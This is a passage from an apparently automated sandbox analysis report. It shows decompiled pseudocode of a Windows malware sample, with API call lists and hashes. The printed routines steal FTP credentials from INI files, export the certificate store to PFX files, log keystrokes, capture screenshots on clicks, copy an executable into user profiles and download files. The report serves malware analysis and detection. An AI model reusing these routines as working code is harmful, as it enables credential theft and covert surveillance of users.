                • StrStrIW.SHLWAPI(00000000,default,?,?,?,?,?), ref: 004058E1
                • GetPrivateProfileStringW.KERNEL32 ref: 004058FC
                • GetPrivateProfileStringW.KERNEL32 ref: 00405916
                • GetPrivateProfileStringW.KERNEL32 ref: 00405930
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: PrivateProfileString$AllocHeap
                • String ID: connections$default$ftp://%s:%s@%s$host$password$username
                • API String ID: 2479592106-3902919163
                • Opcode ID: 0847271544df2366b5fa3813b311b4c18add26a7cbafa6a1407352049f84b769
                • Instruction ID: 9760c6139b9182c33011b729d08e3a25ea7ccbfc4018bd697df168868f71fda9
                • Opcode Fuzzy Hash: 0847271544df2366b5fa3813b311b4c18add26a7cbafa6a1407352049f84b769
                • Instruction Fuzzy Hash: 9D31167264030AB7D200BF718C41F2BBB9DEF94758F00043BB545B22E2E67DE9158A69
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (executed / not executed basic blocks of E00408C33; rendered graph not reproduced)
                C-Code - Quality: 79%
                			E00408C33() {
                				char _v5;
                				char* _v12;
                				char _v16;
                				int _v20;
                				int _v24;
                				int _v28;
                				int _v32;
                				char _v552;
                				short _v1072;
                				char _v1592;
                				_Unknown_base(*)()* _t55;
                				int _t61;
                				char _t62;
                				char _t68;
                				int _t72;
                				char _t73;
                				char _t74;
                				char _t78;
                				char _t80;
                				char _t85;
                				WCHAR* _t90;
                				int _t91;
                				CHAR* _t103;
                				struct HINSTANCE__* _t105;
                				signed int _t106;
                				void* _t107;
                
                				_v5 = 0;
                				_t105 = LoadLibraryA("userenv.dll");
                				if(_t105 == 0) {
                					L7:
                					return 0;
                				} else {
                					_t55 = GetProcAddress(_t105, "GetDefaultUserProfileDirectoryW");
                					if(_t55 != 0) {
                						_push( &_v12);
                						_t98 =  &_v552;
                						_push( &_v552);
                						_v12 = 0x104;
                						if( *_t55() == 1) {
                							_t90 =  &_v1072;
                							__imp__SHGetFolderPathW(0, 7, 0xffffffff, 1, _t90);
                							if(_t90 == 0) {
                								_t98 =  &_v552;
                								_t91 = E0040A3AA(_t98);
                								_v12 = _t91;
                								if(StrCmpNIW(_t98,  &_v1072, _t91) == 0) {
                									_t98 = _t107 + _v12 * 2 - 0x42c;
                									E00409AD3(_t94 | 0xffffffff, _t107 + _v12 * 2 - 0x42c,  &_v1072);
                									_v5 = 1;
                								}
                							}
                						}
                					}
                					FreeLibrary(_t105);
                					if(_v5 != 0) {
                						_v5 = 0;
                						_v24 = 0;
                						_t103 = L".exe";
                						do {
                							_v12 = 0;
                							_t61 = NetUserEnum(0, 0, 2,  &_v12, 0xffffffff,  &_v20,  &_v32,  &_v24);
                							_v28 = _t61;
                							__eflags = _t61;
                							if(_t61 == 0) {
                								L11:
                								__eflags = _v12;
                								if(_v12 == 0) {
                									goto L24;
                								}
                								_t106 = 0;
                								__eflags = _v20;
                								if(_v20 <= 0) {
                									L23:
                									NetApiBufferFree(_v12);
                									goto L24;
                								} else {
                									goto L13;
                								}
                								do {
                									L13:
                									_t72 = NetUserGetInfo(0,  *(_v12 + _t106 * 4), 0x17,  &_v16);
                									__eflags = _t72;
                									if(_t72 == 0) {
                										_t73 = _v16;
                										__eflags = _t73;
                										if(_t73 != 0) {
                											_t98 =  &_v552;
                											_t74 = E0040F88A( *((intOrPtr*)(_t73 + 0x10)),  &_v552);
                											__eflags = _t74;
                											if(_t74 != 0) {
                												_t78 = E0040B635( &_v1072,  &_v552,  &_v552);
                												__eflags = _t78;
                												if(_t78 != 0) {
                													_t80 = E0040B3BA( &_v552);
                													__eflags = _t80;
                													if(_t80 != 0) {
                														__eflags = E0040E80B(0,  &_v552,  &_v1592, _t103, 6);
                														if(__eflags != 0) {
                															_t85 = E004083EA( &_v552, __eflags, 0,  &_v1592, 0);
                															__eflags = _t85;
                															if(_t85 != 0) {
                																_v5 = 1;
                																E0040851A( &_v552,  *((intOrPtr*)(_v16 + 0x10)),  &_v1592);
                															}
                														}
                													}
                												}
                											}
                											NetApiBufferFree(_v16);
                										}
                									}
                									_t106 = _t106 + 1;
                									__eflags = _t106 - _v20;
                								} while (_t106 < _v20);
                								goto L23;
                							}
                							__eflags = _t61 - 0xea;
                							if(_t61 != 0xea) {
                								break;
                							}
                							goto L11;
                							L24:
                							__eflags = _v28 - 0xea;
                						} while (_v28 == 0xea);
                						_t62 =  &_v1072;
                						__imp__SHGetFolderPathW(0, 0x8007, 0xffffffff, 1, _t62);
                						__eflags = _t62;
                						if(_t62 == 0) {
                							__eflags = E0040E80B(0,  &_v1072,  &_v1592, _t103, 6);
                							if(__eflags != 0) {
                								_t68 = E004083EA(_t98, __eflags, 0,  &_v1592, 0);
                								__eflags = _t68;
                								if(_t68 != 0) {
                									_v5 = 1;
                								}
                							}
                						}
                						return _v5;
                					}
                					goto L7;
                				}
                			}
                Instruction addresses: 0x00408c45 to 0x00408e53

                APIs
                • LoadLibraryA.KERNEL32(userenv.dll,74B5F9B0,00000000), ref: 00408C48
                • GetProcAddress.KERNEL32(00000000,GetDefaultUserProfileDirectoryW), ref: 00408C5E
                • SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00408C8F
                • StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00408CB2
                • FreeLibrary.KERNEL32(00000000), ref: 00408CD9
                • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408D10
                • NetUserGetInfo.NETAPI32(00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408D48
                • NetApiBufferFree.NETAPI32(?,?,?,00000000,?,00000017,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408DE0
                • NetApiBufferFree.NETAPI32(?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408DF2
                • SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?,00000000,00000000,00000002,?,000000FF,00408169,?,?,74B05B60), ref: 00408E15
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Free$BufferFolderLibraryPathUser$AddressEnumInfoLoadProc
                • String ID: .exe$GetDefaultUserProfileDirectoryW$userenv.dll
                • API String ID: 1753652487-2535535916
                • Opcode ID: 8522e15a5bbb1017e1948a9b92b798a491ac6f7ed5a61d5b02735f8fe3518bc0
                • Instruction ID: 9c532109959bf1d4a426521ac1fb9af1ba8af4f63eee475e6ae0cdb3da1a6dcb
                • Opcode Fuzzy Hash: 8522e15a5bbb1017e1948a9b92b798a491ac6f7ed5a61d5b02735f8fe3518bc0
                • Instruction Fuzzy Hash: D6516471904218AADF10EBA4CE84EEFB7BDAF14304F4005BAF541F21C1DB799A49CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 91%
                			E0040540A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
                				short _v524;
                				int _v528;
                				short* _v532;
                				WCHAR* _v536;
                				WCHAR* _v540;
                				WCHAR* _v544;
                				intOrPtr _v548;
                				void* __edi;
                				WCHAR* _t43;
                				long _t44;
                				intOrPtr _t54;
                				int _t57;
                				void* _t67;
                				WCHAR* _t87;
                				WCHAR* _t88;
                				intOrPtr _t90;
                				signed int _t95;
                				void* _t97;
                
                				_t97 = (_t95 & 0xfffffff8) - 0x21c;
                				if(E0040B635( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
                					L20:
                					return 1;
                				}
                				if(( *__edx & 0x00000010) == 0) {
                					_t43 = HeapAlloc( *0x41a570, 8, 0x20002);
                					_v540 = _t43;
                					if(_t43 == 0) {
                						goto L20;
                					}
                					_t44 = GetPrivateProfileStringW(0, 0, 0, _t43, 0xffff,  &_v524);
                					if(_t44 <= 0) {
                						L19:
                						E004097F7(_v540);
                						goto L20;
                					}
                					_t9 = _t44 + 1; // 0x1
                					if(E0040A6AE(_v540, _t9) == 0) {
                						goto L19;
                					}
                					_t87 = HeapAlloc( *0x41a570, 8, 0xc20);
                					_v536 = _t87;
                					if(_t87 == 0) {
                						goto L19;
                					} else {
                						_t12 =  &(_t87[0x1fe]); // 0x3fc
                						_v532 =  &(_t12[0xff]);
                						_v544 = _v540;
                						goto L9;
                						L17:
                						_t54 = E0040A6EC(_v544, 1);
                						_v548 = _t54;
                						if(_t54 != 0) {
                							_t87 = _v536;
                							L9:
                							if(GetPrivateProfileStringW(_v544, L"IP", 0, _t87, 0xff,  &_v524) > 0) {
                								_t57 = GetPrivateProfileIntW(_v544, L"port", 0x15,  &_v524);
                								_v528 = _t57;
                								if(_t57 - 1 <= 0xfffe) {
                									_t88 =  &(_t87[0xff]);
                									if(GetPrivateProfileStringW(_v544, L"user", 0, _t88, 0xff,  &_v524) > 0) {
                										_t25 =  &(_t88[0xff]); // 0x0
                										if(GetPrivateProfileStringW(_v544, L"pass", 0, _t25, 0xff,  &_v524) > 0) {
                											_t28 =  &(_t88[0xff]); // 0x0
                											if(E0040530C(_v544, _t28) > 0) {
                												_push(_v528);
                												_t30 =  &(_t88[0xff]); // 0x0
                												_push(_v536);
                												_push(_t30);
                												_push(_t88);
                												_t89 = _v532;
                												_t67 = E0040A4B7(_t30, 0x311, _v532, L"ftp://%s:%s@%s:%u\n");
                												_t97 = _t97 + 0x14;
                												if(_t67 > 0) {
                													_t90 = _a4;
                													if(E00409B2A(_t67, _t90, _t89) != 0) {
                														 *((intOrPtr*)(_t90 + 4)) =  *((intOrPtr*)(_t90 + 4)) + 1;
                													}
                												}
                											}
                										}
                									}
                								}
                							}
                							goto L17;
                						} else {
                							E004097F7(_v536);
                							goto L19;
                						}
                					}
                				} else {
                					E004053D2(_a4);
                					goto L20;
                				}
                			}
                Instruction addresses: 0x00405410 to 0x004055da

                APIs
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • HeapAlloc.KERNEL32(00000008,00020002,?), ref: 0040545A
                • GetPrivateProfileStringW.KERNEL32 ref: 0040547E
                • HeapAlloc.KERNEL32(00000008,00000C20), ref: 004054A9
                • GetPrivateProfileStringW.KERNEL32 ref: 004054ED
                • GetPrivateProfileIntW.KERNEL32 ref: 00405507
                • GetPrivateProfileStringW.KERNEL32 ref: 00405535
                • GetPrivateProfileStringW.KERNEL32 ref: 00405553
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: PrivateProfile$String$AllocHeap$CombinePath
                • String ID: ftp://%s:%s@%s:%u$pass$port$user
                • API String ID: 3432043379-2696999094
                • Opcode ID: 4212a90c89c6ed554a8e16240747d78768c1d2de7a9de229284e73204cd694f9
                • Instruction ID: 72fe7dc15f22425cf4ee1af48bbec92acf04fd879257a37779c6b1a9e5182891
                • Opcode Fuzzy Hash: 4212a90c89c6ed554a8e16240747d78768c1d2de7a9de229284e73204cd694f9
                • Instruction Fuzzy Hash: BD418F71144706BBD7109F61CC81FABB7E9FB88704F10093AB984B22E1D778E9198F5A
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CertOpenSystemStoreW.CRYPT32(00000000,00402B6C), ref: 00412695
                • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 004126B1
                • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 004126BD
                • PFXExportCertStoreEx.CRYPT32(?,?,pass,00000000,00000004), ref: 004126F1
                • PFXExportCertStoreEx.CRYPT32(?,?,pass,00000000,00000004), ref: 00412725
                • CharLowerW.USER32 ref: 00412741
                • GetSystemTime.KERNEL32(?), ref: 0041274C
                  • Part of subcall function 004097CC: HeapAlloc.KERNEL32(00000008,-00000004,0040F499,00000000,?,?,?,?,00407564,00000000,00407832,?,00000000), ref: 004097D8
                • CertCloseStore.CRYPT32(?,00000000), ref: 004127AE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: CertStore$CertificatesEnumExportSystem$AllocCharCloseHeapLowerOpenTime
                • String ID: certs\%s_%02u_%02u_%04u.pfx$pass
                • API String ID: 3339301666-1785743025
                • Opcode ID: 66c63be07a13ea0a04fe17957175bb7b27f48ad151267107066884165e491052
                • Instruction ID: a9b3bcabc72352b6f95679d30d7f69f4e91b295b04b34c8c8467c1bd49037814
                • Opcode Fuzzy Hash: 66c63be07a13ea0a04fe17957175bb7b27f48ad151267107066884165e491052
                • Instruction Fuzzy Hash: 59312975504341AEC7119F658E84EBB7BECAB84314F04093FF9D4E21D1C678CD94876A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00412AC1(MSG* _a4) {
                				char _v524;
                				char _v780;
                				short _v800;
                				void* __edi;
                				void* __esi;
                				int _t20;
                				signed int _t22;
                				signed int _t27;
                				char* _t32;
                				MSG* _t40;
                				char* _t46;
                				intOrPtr* _t50;
                				signed int _t51;
                				void* _t53;
                
                				_t53 = (_t51 & 0xfffffff8) - 0x31c;
                				_t40 = _a4;
                				if(_t40 == 0 || E00407B3F() == 0) {
                					L20:
                					E00407B30();
                					return TranslateMessage(_t40);
                				} else {
                					_t20 = _t40->message;
                					if(_t20 != 0x201) {
                						__eflags = _t20 - 0x100;
                						if(_t20 != 0x100) {
                							goto L20;
                						}
                						__eflags = _t40->wParam - 0x1b;
                						if(_t40->wParam == 0x1b) {
                							goto L20;
                						}
                						_t22 = GetKeyboardState( &_v780);
                						__eflags = _t22;
                						if(_t22 == 0) {
                							goto L20;
                						}
                						_t27 = ToUnicode(_t40->wParam, _t40->lParam & 0x000000ff,  &_v780,  &_v800, 9, 0);
                						__eflags = _t27;
                						if(_t27 <= 0) {
                							goto L20;
                						}
                						__eflags = _t27 - 1;
                						if(__eflags != 0) {
                							if(__eflags > 0) {
                								L18:
                								__eflags = 0;
                								 *((short*)(_t53 + 0xc + _t27 * 2)) = 0;
                								_push( &_v800);
                								L19:
                								E00412923();
                								goto L20;
                							}
                							L17:
                							__eflags = _v800 - 0x20;
                							if(_v800 < 0x20) {
                								goto L20;
                							}
                							goto L18;
                						}
                						__eflags = _t40->wParam - 8;
                						if(_t40->wParam != 8) {
                							goto L17;
                						}
                						_push(0x402be4);
                						goto L19;
                					}
                					EnterCriticalSection(0x41aa20);
                					if( *0x41aa18 > 0) {
                						 *0x41aa18 =  *0x41aa18 + 0xffff;
                						_t50 = E00411408(L"image/jpeg", 0x1e, 0x1f4);
                						if(_t50 != 0) {
                							_t32 =  *0x41aa10; // 0x0
                							_t46 =  &M0040269C;
                							if(_t32 != 0) {
                								_t46 = _t32;
                							}
                							E0040A4B7(_t33, 0x104,  &_v524, L"screenshots\\%s\\%04x_%08x.jpg");
                							E0041249C(0x104, _t50,  &_v524);
                							 *((intOrPtr*)( *_t50 + 8))(_t50, _t46,  *0x419544, GetTickCount());
                						}
                					}
                					LeaveCriticalSection(0x41aa20);
                					goto L20;
                				}
                			}
                Instruction addresses: 0x00412ac7 to 0x00412c00

                APIs
                • TranslateMessage.USER32(?), ref: 00412BF4
                  • Part of subcall function 00407B3F: WaitForSingleObject.KERNEL32(00000000,004157E2,19367400,00000001), ref: 00407B47
                • EnterCriticalSection.KERNEL32(0041AA20), ref: 00412AFB
                • LeaveCriticalSection.KERNEL32(0041AA20), ref: 00412B78
                  • Part of subcall function 00411408: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041143A
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041144B
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00411458
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 00411465
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 00411472
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041147F
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041148C
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 00411499
                  • Part of subcall function 00411408: LoadLibraryA.KERNEL32(ole32.dll), ref: 004114E1
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 004114EC
                  • Part of subcall function 00411408: LoadLibraryA.KERNEL32(gdi32.dll), ref: 004114FE
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 00411509
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 00411515
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 00411522
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041152F
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041153C
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 00411549
                  • Part of subcall function 00411408: GetProcAddress.KERNEL32(00000000,DeleteObject), ref: 00411556
                • GetTickCount.KERNEL32 ref: 00412B3E
                • GetKeyboardState.USER32(?), ref: 00412B92
                • ToUnicode.USER32 ref: 00412BB7
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressProc$LibraryLoad$CriticalSection$CountEnterKeyboardLeaveMessageObjectSingleStateTickTranslateUnicodeWait
                • String ID: $image/jpeg$screenshots\%s\%04x_%08x.jpg$unknown
                • API String ID: 2762424063-35585939
                • Opcode ID: 1b146a80f41092f82f8b3871739d025665800b86e48d677a628edcdbcc50abf9
                • Instruction ID: 13950b7b8cf7d50df6825d4623fc95f113c51a662aff149dfa552fe96330cf05
                • Opcode Fuzzy Hash: 1b146a80f41092f82f8b3871739d025665800b86e48d677a628edcdbcc50abf9
                • Instruction Fuzzy Hash: A831A33160820567D720AF55DE49AEB77A8EF44724F14443BF800FA2A1D6BCE9E0C76E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 58%
                			E0040F61D(void* _a4, WCHAR* _a8) {
                				WCHAR* _v5;
                				char _v12;
                				signed int _v16;
                				struct HINSTANCE__* _v20;
                				_Unknown_base(*)()* _v24;
                				struct _PROCESS_INFORMATION _v40;
                				struct _STARTUPINFOW _v108;
                				struct HINSTANCE__* _t28;
                				_Unknown_base(*)()* _t31;
                				WCHAR* _t49;
                				long _t50;
                				intOrPtr* _t52;
                
                				_v5 = 0;
                				_t28 = LoadLibraryA("userenv.dll");
                				_v20 = _t28;
                				if(_t28 != 0) {
                					_t52 = GetProcAddress(_t28, "CreateEnvironmentBlock");
                					_t31 = GetProcAddress(_v20, "DestroyEnvironmentBlock");
                					_v24 = _t31;
                					if(_t52 != 0 && _t31 != 0) {
                						_push(0);
                						_push(_a4);
                						_push( &_v16);
                						_v16 = 0;
                						if( *_t52() == 0) {
                							_v16 = 0;
                						}
                						_t50 = 0x44;
                						_v12 = 0;
                						E004098AA( &_v108,  &_v108, 0, _t50);
                						_t49 = _a8;
                						_v108.cb = _t50;
                						_v108.lpDesktop = 0;
                						if(_t49 == 0) {
                							_t49 =  &_v12;
                						}
                						asm("sbb eax, eax");
                						if(CreateProcessAsUserW(_a4, 0, _t49, 0, 0, 0,  ~_v16 & 0x00000400 | 0x04000000, _v16, 0,  &_v108,  &_v40) != 0) {
                							CloseHandle(_v40.hThread);
                							CloseHandle(_v40);
                							_v5 = _v40.dwProcessId != 0;
                						}
                						if(_v16 != 0) {
                							_v24(_v16);
                						}
                					}
                					FreeLibrary(_v20);
                				}
                				return _v5 & 0x000000ff;
                			}

                APIs
                • LoadLibraryA.KERNEL32(userenv.dll,?), ref: 0040F62E
                • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040F64D
                • GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 0040F659
                • CreateProcessAsUserW.ADVAPI32(?,00000000,004084FD,00000000,00000000,00000000,004084FD,004084FD,00000000,?,?,?,00000000,00000044), ref: 0040F6CA
                • CloseHandle.KERNEL32(?), ref: 0040F6DD
                • CloseHandle.KERNEL32(?), ref: 0040F6E2
                • FreeLibrary.KERNEL32(?), ref: 0040F6F9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: AddressCloseHandleLibraryProc$CreateFreeLoadProcessUser
                • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$userenv.dll
                • API String ID: 3080530829-1103369309
                • Opcode ID: 8264edb7844af7ea635a57b201bb4f1374cc20cc2e818b7280bef1f0d9bfb00f
                • Instruction ID: afb527d5c19ea0ab62fb7aedeab92b7570d227b6203c03c99381df5b737a3347
                • Opcode Fuzzy Hash: 8264edb7844af7ea635a57b201bb4f1374cc20cc2e818b7280bef1f0d9bfb00f
                • Instruction Fuzzy Hash: 29211A72D0021DAFDF109FA5CD849EEBBB9EF48344F14847AE500B61A0D6799E49CB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E0040B4D8(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, long _a24, long _a28) {
                				short _v524;
                				struct _WIN32_FIND_DATAW _v1116;
                				intOrPtr _v1120;
                				intOrPtr _v1124;
                				void* _v1128;
                				int _t51;
                				signed int _t60;
                				long _t68;
                				signed char _t71;
                				signed int _t83;
                
                				_v1120 = __edx;
                				_v1124 = __ecx;
                				_t51 = E0040B635("*",  &_v524, __ecx);
                				if(_t51 == 0) {
                					L25:
                					return _t51;
                				}
                				_t51 = FindFirstFileW( &_v524,  &_v1116);
                				_v1128 = _t51;
                				if(_t51 != 0xffffffff) {
                					_t71 = _a8;
                					while(1) {
                						_t83 = 0;
                						if(_a20 != 0 && WaitForSingleObject(_a20, 0) != 0x102) {
                							break;
                						}
                						if(E0040B2FC( &(_v1116.cFileName)) != 0) {
                							L23:
                							if(FindNextFileW(_v1128,  &_v1116) != 0) {
                								continue;
                							}
                							break;
                						}
                						_t60 = _v1116.dwFileAttributes & 0x00000010;
                						if(_t60 == 0 || (_t71 & 0x00000002) == 0) {
                							if(_t60 != _t83 || (_t71 & 0x00000004) == 0) {
                								goto L17;
                							} else {
                								goto L10;
                							}
                						} else {
                							L10:
                							if(_a4 <= 0) {
                								L17:
                								if((_v1116.dwFileAttributes & 0x00000010) != 0 && (_t71 & 0x00000001) != 0 && E0040B635( &(_v1116.cFileName),  &_v524, _v1124) != 0) {
                									_t103 = _a24;
                									if(_a24 != 0) {
                										Sleep(_a24);
                									}
                									E0040B4D8( &_v524, _v1120, _t103, _a4, _t71, _a12, _a16, _a20, _a24, _a28);
                								}
                								goto L23;
                							}
                							while(PathMatchSpecW( &(_v1116.cFileName),  *(_v1120 + _t83 * 4)) == 0) {
                								_t83 = _t83 + 1;
                								if(_t83 < _a4) {
                									continue;
                								}
                								goto L17;
                							}
                							_t68 = _a12(_a16);
                							__eflags = _t68;
                							if(_t68 == 0) {
                								break;
                							}
                							__eflags = _a28;
                							if(_a28 != 0) {
                								Sleep(_a28);
                							}
                							goto L17;
                						}
                					}
                					_t51 = FindClose(_v1128);
                				}
                			}

                APIs
                  • Part of subcall function 0040B635: PathCombineW.SHLWAPI(?,?,00401EC0,004076D9,?,?,?,00000000), ref: 0040B64C
                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B517
                • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B53E
                • PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040B589
                • Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 0040B5B6
                • Sleep.KERNEL32(00000000,?,?), ref: 0040B5E6
                • FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040B614
                • FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040B626
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.198032343.0000000000419000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.198049437.000000000041B000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_executable.jbxd
                Yara matches
                Similarity
                • API ID: Find$FilePathSleep$CloseCombineFirstMatchNextObjectSingleSpecWait
                • String ID:
                • API String ID: 2348139788-0
                • Opcode ID: b6408d2e735705dc498f71382424c17b71c6ae71ece8321909fa7e05c4e6c160
                • Instruction ID: d5b712001275de6e6bbc6900295be6dd5e38ba9740441f89fc6e4bf5f92aa16b
                • Opcode Fuzzy Hash: b6408d2e735705dc498f71382424c17b71c6ae71ece8321909fa7e05c4e6c160
                • Instruction Fuzzy Hash: 46416C31004209ABCB21DF15DD48AEF7BA9EF54348F04493AF994A22E1D33AC955CBDE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040AC31(void* __edi, void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
                				char _v5;
                				long _v12;
                				struct _OVERLAPPED* _v16;
                				long _v20;
                				long _t32;
                				void* _t37;
                				void* _t39;
                
                				_v5 = 0;
                				_t39 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                				if(_t39 == 0xffffffff) {
                					L15:
                					return _v5;
                				}
                				_t37 = HeapAlloc( *0x41a570, 8, 0x1004);
                				if(_t37 == 0) {
                					L13:
                					CloseHandle(_t39);
                					if(_v5 == 0) {
                						E0040B1CD(_a8);
                					}
                					goto L15;
                				}
                				_v16 = 0;
                				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
                					if(InternetReadFile(_a4, _t37, 0x1000,  &_v12) == 0) {
                						break;
                					}
                					if(_v12 == 0) {
                						FlushFileBuffers(_t39);
                						_v5 = 1;
                						break;
                					}
                					if(WriteFile(_t39, _t37, _v12,  &_v20, 0) == 0) {
                						break;
                					}
                					_t32 = _v12;
                					if(_t32 != _v20) {
                						break;
                					}
                					_v16 = _v16 + _t32;
                					if(_v16 <= _a12) {
                						continue;
                					}
                					break;
                				}
                				E004097F7(_t37);
                				goto L13;
                			}

                APIs
                • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,00000000), ref: 0040AC51
                • HeapAlloc.KERNEL32(00000008,00001004,?), ref: 0040AC70
                • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040AC88
                • InternetReadFile.WININET(00001000,00000000,00001000,?), ref: 0040ACA2
                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040ACBB
                • FlushFileBuffers.KERNEL32(00000000), ref: 0040ACDB
                • CloseHandle.KERNEL32(00000000), ref: 0040ACEC
                Memory Dump Source
                • Source File: 00000000.00000002.198011061.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.198006925.0000000000400000.00000002.00020000.sdmp
